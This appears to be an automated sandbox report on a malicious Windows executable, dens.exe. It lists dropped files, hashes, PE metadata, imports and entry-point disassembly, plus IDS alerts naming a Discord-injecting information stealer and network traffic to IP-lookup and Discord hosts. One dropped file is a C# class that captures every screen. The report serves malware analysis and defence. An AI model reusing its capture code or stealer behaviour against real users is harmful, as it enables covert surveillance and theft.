                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1004
                                                                                                                                                                                                                                            Entropy (8bit):4.154581034278981
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                                                                                            MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                                            SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                                            SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                                            SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):607
                                                                                                                                                                                                                                            Entropy (8bit):5.352580405813052
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikOfhXUWZEifhXR:V3ka6KOkqeFkOfx1EifxR
                                                                                                                                                                                                                                            MD5:9E3513A9368D09B95BCB5D7CAFDB6BDB
                                                                                                                                                                                                                                            SHA1:79EFAEF45A731624225FD12007231EB5E7542DD3
                                                                                                                                                                                                                                            SHA-256:87528BB9157254DC0C54D3F76098E6915ACF4CA355FB8D7FCDF67B1AF9E9A747
                                                                                                                                                                                                                                            SHA-512:50778BCF7578E5B92F29230BD8B31BD86E0B3ECCB607D792ADB763E8100916A7638F2497A967B1259C7D449B85EFFAD65CC2C914DB8BBD6AE82BC9AC03F3DC96
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\mugnbzbx\mugnbzbx.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mugnbzbx\mugnbzbx.0.cs"
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (734), with CRLF, CR line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1155
                                                                                                                                                                                                                                            Entropy (8bit):5.480066177032836
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:KJfUId3ka6KOkqeFkOfx1Eifx0Kax5DqBVKVrdFAMBJTH:uUkka6NkqeFkyx1Eux0K2DcVKdBJj
                                                                                                                                                                                                                                            MD5:787277F9BB7E62446B7AC777EC08EB81
                                                                                                                                                                                                                                            SHA1:AC58A48A8BB9D257F8EE292235926517B4CAAA35
                                                                                                                                                                                                                                            SHA-256:ED7D0B2396E0B478CDB982DDF5ED454501BFF45850DCFA6A9A9ECF1B2E954126
                                                                                                                                                                                                                                            SHA-512:A8A8752DD63372D7FE42DF91513E85948780A7A47E76F7F25E03BB2BEE867F7931CAE8E0C215C36144576564E3EEE7658A856D0006C43734F010B7AC08014772
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:.C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\mugnbzbx\mugnbzbx.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mugnbzbx\mugnbzbx.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):16905542
                                                                                                                                                                                                                                            Entropy (8bit):7.996534016135247
                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                            SSDEEP:393216:ImyCi6hZ2YsHFUK2JjXMCHWUjtjx5WsqWxTC0xQwe8les+j:1yCi+Z2YwUlJjXMb8AsqACj3Qes
                                                                                                                                                                                                                                            MD5:258322C37F4F5C632BD6C79520899603
                                                                                                                                                                                                                                            SHA1:F7971D8FEF96C59DF97A2B31436CC0C1F8921182
                                                                                                                                                                                                                                            SHA-256:09B67CCD7D38D2F868EB2A67C73E2E8D45AEFE1054522477B259C399527B2C39
                                                                                                                                                                                                                                            SHA-512:BFAF83D01607C5D481F6AA0415E243C91A28F84F595C65F76EF6B9291CCCC8D58D02F114B3D30CB24D6FA5E8D2ED6013A2609715344739946DCCED07B7BABEBC
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Zpc.Zpc.Zpc...`.]pc...f..pc...g.Ppc....Ypc...`.Spc...g.Kpc...f.rpc...b.Qpc.Zpb..pc.O.g.Cpc.O.a.[pc.RichZpc.........PE..d...M..g.........."....(.....~.................@..........................................`.................................................\...x....p.......@..P"..............d...................................@...@............................................text............................... ..`.rdata..P*.......,..................@..@.data....S..........................@....pdata..P"...@...$..................@..@.rsrc........p......................@..@.reloc..d...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                                                                            Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                            MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                            SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                            SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                            SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                                                                            Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                            MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                            SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                            SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                            SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):55
                                                                                                                                                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Entropy (8bit):7.996534016135247
                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                            • Win64 Executable GUI (202006/5) 77.37%
                                                                                                                                                                                                                                            • InstallShield setup (43055/19) 16.49%
                                                                                                                                                                                                                                            • Win64 Executable (generic) (12005/4) 4.60%
                                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.77%
                                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.77%
                                                                                                                                                                                                                                            File name:dens.exe
                                                                                                                                                                                                                                            File size:16'905'542 bytes
                                                                                                                                                                                                                                            MD5:258322c37f4f5c632bd6c79520899603
                                                                                                                                                                                                                                            SHA1:f7971d8fef96c59df97a2b31436cc0c1f8921182
                                                                                                                                                                                                                                            SHA256:09b67ccd7d38d2f868eb2a67c73e2e8d45aefe1054522477b259c399527b2c39
                                                                                                                                                                                                                                            SHA512:bfaf83d01607c5d481f6aa0415e243c91a28f84f595c65f76ef6b9291cccc8d58d02f114b3d30cb24d6fa5e8d2ed6013a2609715344739946dcced07b7babebc
                                                                                                                                                                                                                                            SSDEEP:393216:ImyCi6hZ2YsHFUK2JjXMCHWUjtjx5WsqWxTC0xQwe8les+j:1yCi+Z2YwUlJjXMb8AsqACj3Qes
                                                                                                                                                                                                                                            TLSH:8807334467F128E9D9EF403D9A97D569EA73B84A1FF5C24FC79C02920E331A41E39B21
                                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Zpc.Zpc.Zpc...`.]pc...f..pc...g.Ppc.....Ypc...`.Spc...g.Kpc...f.rpc...b.Qpc.Zpb..pc.O.g.Cpc.O.a.[pc.RichZpc.........PE..d..
                                                                                                                                                                                                                                            Icon Hash:6989b5a1a1a5a1a1
                                                                                                                                                                                                                                            Entrypoint:0x14000cdb0
                                                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                            Time Stamp:0x670EF04D [Tue Oct 15 22:44:29 2024 UTC]
                                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                                            File Version Major:6
                                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                                            Import Hash:72c4e339b7af8ab1ed2eb3821c98713a
                                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                                            call 00007F2F54E55EFCh
                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                                                            jmp 00007F2F54E55B1Fh
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                                            call 00007F2F54E562C8h
                                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                                            je 00007F2F54E55CC3h
                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                            mov eax, dword ptr [00000030h]
                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                            mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                                            jmp 00007F2F54E55CA7h
                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                            cmp ecx, eax
                                                                                                                                                                                                                                            je 00007F2F54E55CB6h
                                                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                            cmpxchg dword ptr [0003577Ch], ecx
                                                                                                                                                                                                                                            jne 00007F2F54E55C90h
                                                                                                                                                                                                                                            xor al, al
                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                                            mov al, 01h
                                                                                                                                                                                                                                            jmp 00007F2F54E55C99h
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                                            test ecx, ecx
                                                                                                                                                                                                                                            jne 00007F2F54E55CA9h
                                                                                                                                                                                                                                            mov byte ptr [00035765h], 00000001h
                                                                                                                                                                                                                                            call 00007F2F54E553F5h
                                                                                                                                                                                                                                            call 00007F2F54E566E0h
                                                                                                                                                                                                                                            test al, al
                                                                                                                                                                                                                                            jne 00007F2F54E55CA6h
                                                                                                                                                                                                                                            xor al, al
                                                                                                                                                                                                                                            jmp 00007F2F54E55CB6h
                                                                                                                                                                                                                                            call 00007F2F54E631FFh
                                                                                                                                                                                                                                            test al, al
                                                                                                                                                                                                                                            jne 00007F2F54E55CABh
                                                                                                                                                                                                                                            xor ecx, ecx
                                                                                                                                                                                                                                            call 00007F2F54E566F0h
                                                                                                                                                                                                                                            jmp 00007F2F54E55C8Ch
                                                                                                                                                                                                                                            mov al, 01h
                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                            inc eax
                                                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                            sub esp, 20h
                                                                                                                                                                                                                                            cmp byte ptr [0003572Ch], 00000000h
                                                                                                                                                                                                                                            mov ebx, ecx
                                                                                                                                                                                                                                            jne 00007F2F54E55D09h
                                                                                                                                                                                                                                            cmp ecx, 01h
                                                                                                                                                                                                                                            jnbe 00007F2F54E55D0Ch
                                                                                                                                                                                                                                            call 00007F2F54E5623Eh
                                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                                            je 00007F2F54E55CCAh
                                                                                                                                                                                                                                            test ebx, ebx
                                                                                                                                                                                                                                            jne 00007F2F54E55CC6h
                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                            lea ecx, dword ptr [00035716h]
                                                                                                                                                                                                                                            call 00007F2F54E62FF2h
                                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3ca5c0x78.rdata
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x178c.rsrc
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x440000x2250.pdata
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x490000x764.reloc
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x3a0800x1c.rdata
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39f400x140.rdata
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x4a0.rdata
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                            .text0x10000x29f000x2a000a6c3b829cc8eaabb1a474c227e90407fFalse0.5514206659226191data6.487493643901088IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                            .rdata0x2b0000x12a500x12c00c9531b03ddf41861eeda142139c6800dFalse0.52453125data5.752790286973688IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                            .data0x3e0000x53f80xe00dba0caeecab624a0ccc0d577241601d1False0.134765625data1.8392217063172436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                            .pdata0x440000x22500x2400181312260a85d10a1454ba38901c499bFalse0.4705946180555556data5.290347578351011IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                            .rsrc0x470000x178c0x1800bd909864baf5b29ccc61cfa977b8e075False0.8546549479166666data7.566407732829443IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                            .reloc0x490000x7640x800816c68eeb419ee2c08656c31c06a0fffFalse0.5576171875data5.2809528666624175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                            RT_ICON0x470e80x1180PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9837053571428571
                                                                                                                                                                                                                                            RT_GROUP_ICON0x482680x14data1.05
                                                                                                                                                                                                                                            RT_MANIFEST0x4827c0x50dXML 1.0 document, ASCII text0.4694508894044857
                                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                                            USER32.dllCreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                                                                                                                            COMCTL32.dll
                                                                                                                                                                                                                                            KERNEL32.dllGetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
                                                                                                                                                                                                                                            ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                                                                                                                                            GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW
                                                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                            2024-11-13T00:38:46.672880+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.449744TCP
                                                                                                                                                                                                                                            2024-11-13T00:38:58.408138+01002857287ETPRO MALWARE Python Cstealer/SatanStealer Discord JS Inject Inbound1185.199.108.133443192.168.2.449757TCP
                                                                                                                                                                                                                                            2024-11-13T00:39:26.467794+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.449763TCP
                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:40.278968096 CET4974080192.168.2.4208.95.112.1
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:40.285197973 CET8049740208.95.112.1192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:40.285284996 CET4974080192.168.2.4208.95.112.1
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:40.285893917 CET4974080192.168.2.4208.95.112.1
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:40.292423964 CET8049740208.95.112.1192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:40.880889893 CET8049740208.95.112.1192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:40.906009912 CET4974080192.168.2.4208.95.112.1
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:40.913033962 CET8049740208.95.112.1192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:40.913743973 CET4974080192.168.2.4208.95.112.1
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:53.899693012 CET49752443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:53.899718046 CET44349752162.159.128.233192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:53.899786949 CET49752443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:53.900768995 CET49752443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:53.900783062 CET44349752162.159.128.233192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:54.521121979 CET44349752162.159.128.233192.168.2.4
                                                                                                                                                                                                                                            Nov 13, 2024 00:38:54.521961927 CET49752443192.168.2.4162.159.128.233
